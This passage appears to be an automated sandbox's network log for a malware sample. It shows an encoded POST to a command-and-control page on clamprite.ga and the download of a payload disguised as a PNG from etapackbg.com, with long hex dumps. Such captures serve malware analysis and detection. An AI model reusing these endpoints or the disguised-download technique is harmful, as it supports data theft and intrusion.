                                                                    CF-Cache-Status: HIT
                                                                    Age: 2986
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QbG7m6lAOzqTTLFjYpcMkZk0OJmb6uLswjyS5thr8ApFTtrmPuwJ0PvtoUgPutPaNSLKtd%2FwLppGwR8rbRTe4n4CGOL6VySfFRXGLQf4OvlNAhqhdO27ifwMM6d%2BSWr0"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 6e3816bcebda9162-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                    Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 40 00 00 00 0c 00 0a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: 1@
                                                                    Feb 26, 2022 10:18:55.529661894 CET553INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 00 36 00 34 00 36 00 2e 00 31 00 39 00 30 00 38 00 2e 00 30 00 2e 00
                                                                    Data Ascii: 5646.1908.0.1noisreV ylbmessAD5646.1908.0.1noisreVtcudorP@emaNtcudorP"lld.dmms
                                                                    Feb 26, 2022 10:18:55.529680967 CET554INData Raw: fe 75 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 04 c7 4d 62 18 08 f1 7b 86 eb 86 d3 91 2a d7 d2 bb
                                                                    Data Ascii: uMb{*:5S~NC,o~O]}e[Y9#C*)"DVe|90'(~pK`KD8ma"q9B*LgoEZ7!
                                                                    Feb 26, 2022 10:18:55.529701948 CET556INData Raw: 8c 96 38 c8 14 6f b5 ed 59 94 2e 18 17 b5 a2 82 49 c3 68 85 c3 c3 99 d0 67 27 58 e4 35 3e 70 d7 38 d2 09 ad f7 cd d0 09 37 e2 1d fd 0f ed e3 82 73 ee bd ef 5e 0d 0e 72 a1 59 a5 bb c3 77 d0 5a 75 b2 79 c5 01 81 48 d2 aa 17 f6 3a 6a cb 69 1b c6 30
                                                                    Data Ascii: 8oY.Ihg'X5>p87s^rYwZuyH:ji0?|});2S4k]EUPb,)NIb-M/H*3bb``R)*,O,(JKKH``d\^\LoOH]HU#,B(
                                                                    Feb 26, 2022 10:18:55.529722929 CET557INData Raw: 8f 30 71 84 56 36 a0 4d ae fc 0a 17 9b 52 aa 5b a6 29 40 a5 3c 17 e6 cf 79 1b ba ea 54 e2 aa dc f2 2f d8 49 eb 29 18 47 5e 24 da e8 53 20 55 e0 1c 33 ad 91 9f 05 34 e8 b8 d6 d3 46 16 3b 0b 73 c6 1b 93 74 d8 c0 32 1d d1 2b c0 7c 16 7f dd 4b d2 34
                                                                    Data Ascii: 0qV6MR[)@<yT/I)G^$S U34F;st2+|K4,^H'O}Bm7vef19J#3W`$S^nUk&A89J_S]Jjs.ZFy-$lz%GpsYT$,3JC.4'Ws}t|f
                                                                    Feb 26, 2022 10:18:55.529743910 CET558INData Raw: 52 74 fc 5d 00 b1 a2 28 4d d5 b7 f2 38 f6 49 f4 69 68 62 29 36 b1 5f 9b 1c 15 e8 71 d3 4a 43 2c 11 8f 44 37 f3 d7 a0 04 34 81 06 ed f0 35 58 03 ba 28 4d 35 a8 30 d5 94 a9 fd 04 3b c2 3e 57 4a 41 a1 68 1b cc 3c 54 59 a1 07 17 08 a5 ec 11 76 ba ea
                                                                    Data Ascii: Rt](M8Iihb)6_qJC,D745X(M50;>WJAh<TYvSvM!c,yc't8=(6v*uI I:x:H>YzAFxDkP$~*x]*X_=d#$%uX&G:sBA<,84hL`-\Qq
                                                                    Feb 26, 2022 10:18:55.529763937 CET560INData Raw: fb 8e a9 85 6e a2 0d ea 5e ab e1 b8 05 70 04 c4 9e 67 76 f0 c1 c0 19 87 f2 71 6a b9 dc bd 36 80 ef f4 2b 67 fa aa 03 f2 58 d0 cb 03 8c 4a 93 bb ef 04 c0 5b d0 cd 26 df a3 68 ec b5 01 6d e8 a5 29 e1 58 80 04 ba d9 4c 0e 3b 4c 73 11 40 a1 46 b8 51
                                                                    Data Ascii: n^pgvqj6+gXJ[&hm)XL;Ls@FQi-ck@?E<:s^G7GVqk*j{(f`0?o~yJrFix}U` V?tueK[lzVKZs#9oWkat#W~W7
                                                                    Feb 26, 2022 10:18:55.529781103 CET561INData Raw: 73 01 2d 12 a5 59 b9 c8 66 58 c1 6c 69 e6 b0 85 17 c0 a6 e9 d8 bd 8e 6f 27 9e 92 07 2f 64 dd cd 76 1d 2b 0d 07 bd 11 c4 9e 8d 50 c6 05 9b ed 83 a6 99 a0 d0 74 c9 a3 0b 81 6c 03 7b 98 cd b5 b1 95 17 c0 8a 05 f3 9c be 60 e4 5a 40 eb b4 01 c6 bc df
                                                                    Data Ascii: s-YfXlio'/dv+Ptl{`Z@:t~[Y}6S]K* Ew&]4$$f>xWst11}NeZ3s@P;Libhtg$FPLnFi>GWHQ+>\
                                                                    Feb 26, 2022 10:18:55.529798031 CET562INData Raw: b7 91 47 c1 af a7 28 a0 a0 23 36 01 8b be bf 80 45 dd a0 28 db 5e 11 1f 55 4b 3b 6a d0 c7 f3 21 27 aa 4b 5c 4b a5 74 59 07 3d b1 1e d0 5b 54 2c 1f 22 cb 1f 61 0f 3e 1e 03 7c 55 3c 3b 5c 32 f5 33 3f 2a c1 4e b9 bf d2 1c 7b 42 e9 cf b8 fb 13 00 98
                                                                    Data Ascii: G(#6E(^UK;j!'K\KtY=[T,"a>|U<;\23?*N{B7Do0`{%}OvjVcpp6%<nNX<F`yI4dAaPiTbcm+!ymp7w~Fg;w;M!F'
                                                                    Feb 26, 2022 10:18:55.529813051 CET564INData Raw: 91 42 b0 f2 c3 86 b3 fc b7 df 8a c5 c0 6c b5 9a b6 7f 41 7b d8 bf 70 0c f3 5d fe 04 03 0f 61 eb 2f ab fb 33 d2 f2 41 e9 fc c2 27 e2 99 e6 b8 a7 b0 4d c6 74 be ff 13 b4 46 d4 2f 5a f0 c8 5e a8 b0 47 46 be e3 13 d5 02 71 d1 77 f4 34 f7 e2 2c a0 06
                                                                    Data Ascii: BlA{p]a/3A'MtF/Z^GFqw4,[|3do|tg!nOOOCSR]wii.Zdt4Ic^wmrn[:dJ3N_oC%:%W+@7hj)$~
                                                                    Feb 26, 2022 10:18:55.529836893 CET565INData Raw: 7d d7 f6 22 0a 0a 82 7b 5f f7 03 3b 7e 8d f3 c8 d3 51 85 db c3 cd 0d e1 08 cb 87 2e ce 86 89 99 18 80 85 6c b6 de bd 4a c7 97 02 cb da 21 da 47 d2 4c df c0 da 02 b8 72 83 c7 de c1 10 68 f5 54 8d 76 d1 84 00 ad 3c 21 20 cd f4 25 38 84 d8 8a 1e fa
                                                                    Data Ascii: }"{_;~Q.lJ!GLrhTv<! %8k%aP` !M#37AGuIxNTV,7#]Iyy~kBb>'iJsxO?3t?+='\zu;l9XBK/]U%


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.54977780.66.64.17480C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 26, 2022 10:19:50.294819117 CET5630OUTPOST /azo01/index.php HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                    Host: clamprite.ga
                                                                    Content-Length: 107
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 6d 8b 30 62 8b 30 61 e8 26 66 96 26 66 9f 40 70 9d 35 70 9c 47 13 8b 30 63 ef 42 70 9d 30 70 9d 36 70 9d 34 14
                                                                    Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE10m0b0a&f&f@p5pG0cBp0p6p4
                                                                    Feb 26, 2022 10:19:51.116980076 CET5632INHTTP/1.1 200 OK
                                                                    Date: Sat, 26 Feb 2022 09:19:50 GMT
                                                                    Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                    X-Powered-By: PHP/5.6.40
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 34 34 34 32 66 65 0d 0a 3f 36 90 4f 06 dd 71 1e d7 70 27 e5 7a 26 dc 48 22 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 fb 75 07 e9 55 2f cf 30 07 d8 60 14 c5 72 19 c0 51 61 ca 40 22 df 4f 38 fc 75 0c 9d 64 26 e5 6a 60 d9 59 12 f7 70 1e c7 36 61 cc 4b 18 e4 4e 2f ef 74 18 ea 42 1f e5 74 3e da 40 04 9e 48 06 ff 68 2d e3 47 1c db 4e 01 e7 36 19 c4 46 65 e3 7a 61 9b 4e 01 de 62 04 ff 33 1e 92 2c 36 90 3f 3b 90 aa 40 f7 2f f0 b8 1e 23 0f 08 48 cc a4 42 fb 2f fe a4 5d 27 09 0a 00 82 a7 01 b3 33 b0 fb 1d 30 0a 0a 5f e2 91 a0 9e 01 9d cb 33 50 66 66 65 50 34 30 9e ba 9d cb 33 54 66 66 65 ef cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 17 cb 30 9e 0c 82 71 3d 54 d2 6f a8 8e 73 31 d2 cf bc 9f 5b 3d 15 46 15 dd a4 57 ec 63 f0 eb 50 35 08 08 0a db eb 52 fb 22 ef be 5d 74 0f 08 45 eb 84 63 be 6f f2 af 56 7a 6b 6b 6f 8b cb 30 9e 02 9d cb 33 8f 0b 6d a4 30 c7 55 0c 9d 91 ae a1 cb 6a 03 f7 43 a5 55 0d 9c 91 ae a1 b8 08 07 f6 32 c7 55 0c ee f3 51 a1 ca 6a 03 f7 43 a5 57 0d 9c 91 ae a1 06 0f 05 0d 30 c7 55 0c 52 d8 cb 33 18 67 64 65 2e 71 12 32 02 9d cb 33 54 66 66 65 4f cb 32 bf 09 9c c5 39 54 60 66 65 af cf 30 9e 02 9d cb 33 54 66 66 65 af db 30 9e 02 bd cb 33 54 66 66 75 af db 30 9e 02 9f cb 33 5e 66 66 65 a5 cb 30 9e 08 9d cb 33 54 66 66 65 af fb 30 9e 02 9f cb 33 58 2c 66 65 ac cb 70 9b 02 9d cf 33 54 76 66 65 af cb 20 9e 02 8d cb 33 54 66 66 65 bf cb 30 9e 02 8c cb 33 7f 65 66 65 af cb 30 9e 02 9d cb 33 54 46 66 65 5f c8 30 9e 02 9d cb 33 54 66 66 65 af c7 30 9e 3a a0 cb 33 54 66 66 65 af cb 30 9e 02 8d cb 33 00 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 81 bf 55 e6 76 9d cb 33 7f 62 66 65 af db 30 9e 02 9b cb 33 54 64 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 8f cb 30 fe 2c ef b8 41 37 66 66 65 5f c8 30 9e 02 bd cb 33 54 62 66 65 af c3 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 42 9d cb 73 54 66 66 65 2e 71 12 32 02 9d cb 33 56 66 66 65 94 cb 30 9e 56 8d cb 33 00 64 66 65 af cb 30 9e 83 27 e9 9f 54 66 66 65 a2 cb 30 9e 66 9d cb 33 c4 76 66 65 3f c9 30 9e 02 9d cb 33 d5 dc 44 c9 af cb 30 9e 12 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 06 35 22 36 e2 89 f5 5d d0 3d fe 3e 13 df 5e f3 88 68 54 6b 03 9d cb 33 35 16 0f 48 c2 b8 1d e9 6b f3 e6 50 3b 14 03 48 cc a4 5e ed 6d f1 ae 1e 38 57 4b 54 82 fb 1e ee 66 ff cb 33 54 66 66 65 af db 30 9e 56 9d cb 33 7a 14 02 04 db aa 30 9e 56 8d cb 33 f8 66 66 65 81 b9 54 ff 76 fc ef 49 2e 1c 02 07 c8 cb 30 9e 02 8c cb 33 7f 65 66 65 81 ae 54 ff 76 fc cb 33 54 46 66 65 cf cb 30 9e 2c ef b8 41 37 42 56 54 af cb 30 9e 62 bd cb 33 c4 65 66 65 81 b9 43 ec 61 b9 fb 01 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 83 27 e9 9f 54 66 66 65 1b da 30 9e 03 9d cb 33 5a 66 66 65 a1 cb 30 9e 2a 8c cb 33 34 77 66 65 37 da 30 9e e6 8c cb 33 53 74 66 65 83 d9 30 9e 55 8f cb 33 c5 74 66 65 65 d9 30 9e f0 8f cb 33 4e 75 66 65 e8 d8 30 9e 6d 8e cb 33 cf 75 66 65 66 d8 30 9e ed 8e cb 33 40 72 66 65 78 da 30 9e f8 8c cb 33 49 74 66 65 eb d9 30 9e 71 8f cb 33 ec 74 66 65 4a d9 30 9e 0a 8e cb 33 61 75 66 65 cd d8 30 9e 87 8e cb 33 ee 75 66 65 4e d8 30 9e 04 89 cb 33 54 66 67 65 ad cb 33 9e 06 9d ce 33 52 66 61 65 a7 cb 39 9e 08 9d c0 33 58 66
                                                                    Data Ascii: 4442fe?6Oqp'z&H"Hh-PVePIh9QuU/0`rQa@"O8ud&j`Yp6aKN/tBt>@Hh-GN6FezaNb3,6?;@/#HB/]'30_3PffeP403Tffe03Tffe03Tffe03Tffe0q=Tos1[=FWcP5R"]tEcoVzkko03m0UjCU2UQjCW0UR3gde.q23TffeO29T`fe03Tffe03Tffu03^ffe03Tffe03X,fep3Tvfe 3Tffe03efe03TFfe_03Tffe0:3Tffe03ffe03Tffe03Tffe03Tffe03Tffe03Tffe03TffeUv3bfe03Tdfe03Tffe0,A7ffe_03Tbfe03Tffe0BsTffe.q23Vffe0V3dfe0'Tffe0f3vfe?03D03Tffe035"6]=>^hTk35HkP;H^m8WKTf3Tffe0V3z0V3ffeTvI.03efeTv3TFfe0,A7BVT0b3efeCaTffe03Tffe0'Tffe03Zffe0*34wfe703Stfe0U3tfee03Nufe0m3ufef03@rfex03Itfe0q3tfeJ03aufe03ufeN03Tfge33Rfae93Xf
                                                                    Feb 26, 2022 10:19:51.117042065 CET5633INData Raw: 6b 65 ce bb 59 b3 6f ee e6 44 3d 08 4b 06 c0 b9 55 b3 61 f2 a5 40 3b 0a 03 48 c3 fa 1d af 2f ad e5 57 38 0a 66 24 c3 a7 5f fd 41 f2 a5 40 3b 0a 03 65 c4 ae 42 f0 67 f1 f8 01 7a 27 0a 09 c0 a8 73 f1 6c ee a4 5f 31 66 21 00 db 88 5f f0 71 f2 a7 56
                                                                    Data Ascii: keYoD=KUa@;H/W8f$_A@;eBgz'sl_1f!_qV6f^n&CncT!^m~;eBgz!^m~;eDm\8)EAX1Ep;vG6f"~oA%_gC!#DA:Vwv^6*
                                                                    Feb 26, 2022 10:19:51.117083073 CET5635INData Raw: 3b 9d fb 33 60 66 24 65 9f cb 30 9e 4e 9d dd 33 55 66 25 65 c0 cb 5d 9e 72 9d aa 33 3a 66 1f 65 e1 cb 51 9e 6f 9d ae 33 54 66 66 65 e2 cb 59 9e 61 9d b9 33 3b 66 15 65 c0 cb 56 9e 76 9d eb 33 17 66 09 65 dd cb 40 9e 6d 9d b9 33 35 66 12 65 c6 cb
                                                                    Data Ascii: ;3`f$e0N3Uf%e]r3:feQo3TffeYa3;feVv3fe@m35fe_l3fvevk31f"eCa3=feYm3Tffe@k31fecv36fFe|N3>fCevk31f0eBq3;fe033zfVe43mf_e73|f1e^@3=fe3
                                                                    Feb 26, 2022 10:19:51.117120981 CET5636INData Raw: 4f 19 66 89 9c a6 25 26 49 b5 d5 2f d0 7c eb a9 da 36 1b b6 4b 9b 3e 97 b7 99 97 06 06 b5 e4 4a 59 0a 55 63 ab 8d 69 89 c2 82 fe 98 fc a3 00 c3 62 7d 59 7a 36 55 01 4c 8b e4 0d d5 85 f4 f5 0d 64 7a 36 fe 60 d9 32 72 e6 1b 5d a8 33 09 d2 75 c5 2c
                                                                    Data Ascii: Of%&I/|6K>JYUcib}Yz6ULdz6`2r]3u,xxU6t^W{+Rz7{*-/*1s2#rqR-ndv.Y5!>|R*b`kyHSr:eKL]V1=mbo#X:I?
                                                                    Feb 26, 2022 10:19:51.117160082 CET5637INData Raw: 0a 5f 48 0e ea 50 4f 1a 39 21 68 23 4f 8d df bb bb f7 8b 86 1d d1 a0 be d2 7a 48 c8 9a 91 4d 53 07 c6 2e 59 f8 24 4d 61 9e 27 52 f6 58 1c 76 3e cd a7 d2 dd d1 89 0b b4 d6 f1 1a b4 73 16 fc fa 76 6e 08 8b 9a 61 7e 9e 86 b6 6f 12 8d cd b8 e7 f9 22
                                                                    Data Ascii: _HPO9!h#OzHMS.Y$Ma'RXv>svna~o"t&idedU:Vve'^`nN5I`e04E9i&Af.Eb,UovF^`e0#C`VTc4m^VVQd2K05PS7mU/
                                                                    Feb 26, 2022 10:19:51.117201090 CET5639INData Raw: 7b 63 ac 9e 2d 90 06 8b cf 27 9f 77 8e af 7d 7f 26 c6 03 54 fc 1d 67 70 70 dc e3 51 3a 81 32 96 cd 30 01 7b 69 61 ab c8 32 9f 84 ad d9 35 5d 4d 60 64 ab ca b2 a9 17 9c cf 36 56 65 67 65 ae fb 13 98 0b b6 cd 32 50 67 e4 52 ba c9 34 88 06 89 36 e2
                                                                    Data Ascii: {c-'w}&TgppQ:20{ia25]M`d6Vege2PgR46e(C%^bc;Zw5Ubg23fesC5W3{F&3\a^5<Ko.Kb/Uu>A=ka9_v\9ISnA;k\'_aGz
                                                                    Feb 26, 2022 10:19:51.117238998 CET5640INData Raw: 95 e3 33 e1 47 95 6e d2 fc a6 62 2a 47 0d 54 7b 54 2c 21 03 be ec 19 f8 aa 0a 2f e0 52 e7 2c c7 56 4f 97 8f 45 89 c2 b1 cb e2 8b 30 d7 35 31 04 1f cd c3 b6 54 76 56 23 42 7c ee bd 44 26 0f 1e 00 f9 c9 7b d7 8a 01 e9 ce 06 14 08 d7 f5 c7 04 ad 7e
                                                                    Data Ascii: 3Gnb*GT{T,!/R,VOE051TvV#B|D&{~-a<gGg^_ded6UVjePcVffIhbsDu$l%T-)-iVne0VgU92Qsd2JRe3x2F@hfx Lo^iz<5V9T!Y
                                                                    Feb 26, 2022 10:19:51.117283106 CET5642INData Raw: 6c 4e a9 ca 34 9f 80 aa c1 30 48 57 48 69 83 b8 60 c7 35 e5 9b 71 63 0e 32 50 c8 fe 78 d6 70 c4 bf 0b 26 22 2a 36 e2 f2 66 eb 58 cf be 64 0e 07 03 03 9d ae 02 ac 50 ee fe 07 69 56 3c 63 a5 e0 36 9f 06 9c 49 04 56 67 6a 54 e3 fb 7a 3e 26 1d e9 33
                                                                    Data Ascii: lN40HWHi`5qc2Pxp&"*6fXdPiV<c6IVgjTz>&3feBm3;feU3:feGq<tu9_v\9I_q5]L-)<=3Pge'NO\g<)n;{|l"[Yf@lZA!0zK/YQM?Q
                                                                    Feb 26, 2022 10:19:51.117324114 CET5643INData Raw: 0f ac f3 03 66 57 51 57 9e fe 09 af 31 c7 fb b2 d6 57 6d 55 a6 cd 33 cb 06 9b d8 31 01 35 57 76 9f da 36 9d 57 99 c3 20 5e 31 07 16 c7 a2 5e f9 76 f2 a5 02 44 56 68 63 ac 9e 34 99 11 9a 99 56 30 0b 09 0b cb fa 2e ae 1e 9b c8 66 50 6c 75 70 e2 a2
                                                                    Data Ascii: fWQW1WmU315Wv6W ^1^vDVhc4V0.fPlupSmU F%_c\:WjU30)%T,0Gs+_mQkgDU9MYggd3glg-1nruj7vEJ!F<<lUZr3-gJ8W
                                                                    Feb 26, 2022 10:19:51.117362976 CET5644INData Raw: 15 0d c6 a5 57 ea 6d f3 fa 23 64 68 60 66 fa cf 37 8d 05 cf ae 57 39 09 08 01 9e d5 00 82 04 9e 9e 37 5e 75 73 28 c6 a8 42 f1 71 f2 ad 47 74 25 09 17 df a4 42 ff 76 f4 a4 5d 65 4e 56 43 a9 c8 65 9a 01 8e d4 7e 3d 05 14 0a dc a4 56 ea 22 de a4 57
                                                                    Data Ascii: Wm#dh`f7W97^us(BqGt%Bv]eNVCe~=V"W1F5YepFTU>RoLM6TedUgf`e(of)1_iT!w=b~_gg/$!3SfmL6C-,%Lxb~O2_R
                                                                    Feb 26, 2022 10:19:51.215748072 CET5646INData Raw: 64 ae d8 14 6d 71 1e e2 99 05 7e 5d 5d 2f 3e 0e 13 35 d0 85 4a 10 3b ff 3f b7 1c a1 78 a8 51 3f 91 8b 72 af a6 82 db 3b 96 30 fa da 8b 96 61 9c 9f f7 b2 e1 43 b5 bc a4 3b 45 37 e5 27 ec 8f 98 52 0c 80 b1 69 14 13 04 94 e8 0e 02 d6 70 40 55 2d dd
                                                                    Data Ascii: dmq~]]/>5J;?xQ?r;0aC;E7'Rip@U-VT95Gd367\ul2Xl\:WvU34T5W3bo}a@;EBmG=T0Gy+_mYlTt6%$2Tfg+:CjTffe


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.549790104.21.89.25080C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 26, 2022 10:20:20.015610933 CET20348OUTGET /css/Sngggz.png HTTP/1.1
                                                                    Host: etapackbg.com
                                                                    Connection: Keep-Alive
                                                                    Feb 26, 2022 10:20:20.069284916 CET20349INHTTP/1.1 200 OK
                                                                    Date: Sat, 26 Feb 2022 09:20:20 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 657920
                                                                    Connection: keep-alive
                                                                    cache-control: public, max-age=604800
                                                                    expires: Sat, 05 Mar 2022 08:30:31 GMT
                                                                    last-modified: Fri, 25 Feb 2022 00:36:02 GMT
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    CF-Cache-Status: HIT
                                                                    Age: 2989
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hrnzAi0cCrpzphDhqMBzr9u4WEnOH3upOJ1JxOWQCzKgZ300e%2FDbGNH7FNXb%2FpuggEZ7cEQOgDWcKTKLpg65sDoyBLgWwZxgUHKWXtGEp5DCEHrKbpNCzjpFEv5b8Dzy"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 6e3818cd2b206901-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                    Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 40 00 00 00 0c 00 0a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: 1@
                                                                    Feb 26, 2022 10:20:20.069350958 CET20351INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 00 36 00 34 00 36 00 2e 00 31 00 39 00 30 00 38 00 2e 00 30 00 2e 00
                                                                    Data Ascii: 5646.1908.0.1noisreV ylbmessAD5646.1908.0.1noisreVtcudorP@emaNtcudorP"lld.dmms
                                                                    Feb 26, 2022 10:20:20.069395065 CET20352INData Raw: fe 75 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 04 c7 4d 62 18 08 f1 7b 86 eb 86 d3 91 2a d7 d2 bb
                                                                    Data Ascii: uMb{*:5S~NC,o~O]}e[Y9#C*)"DVe|90'(~pK`KD8ma"q9B*LgoEZ7!
                                                                    Feb 26, 2022 10:20:20.069438934 CET20353INData Raw: 8c 96 38 c8 14 6f b5 ed 59 94 2e 18 17 b5 a2 82 49 c3 68 85 c3 c3 99 d0 67 27 58 e4 35 3e 70 d7 38 d2 09 ad f7 cd d0 09 37 e2 1d fd 0f ed e3 82 73 ee bd ef 5e 0d 0e 72 a1 59 a5 bb c3 77 d0 5a 75 b2 79 c5 01 81 48 d2 aa 17 f6 3a 6a cb 69 1b c6 30
                                                                    Data Ascii: 8oY.Ihg'X5>p87s^rYwZuyH:ji0?|});2S4k]EUPb,)NIb-M/H*3bb``R)*,O,(JKKH``d\^\LoOH]HU#,B(
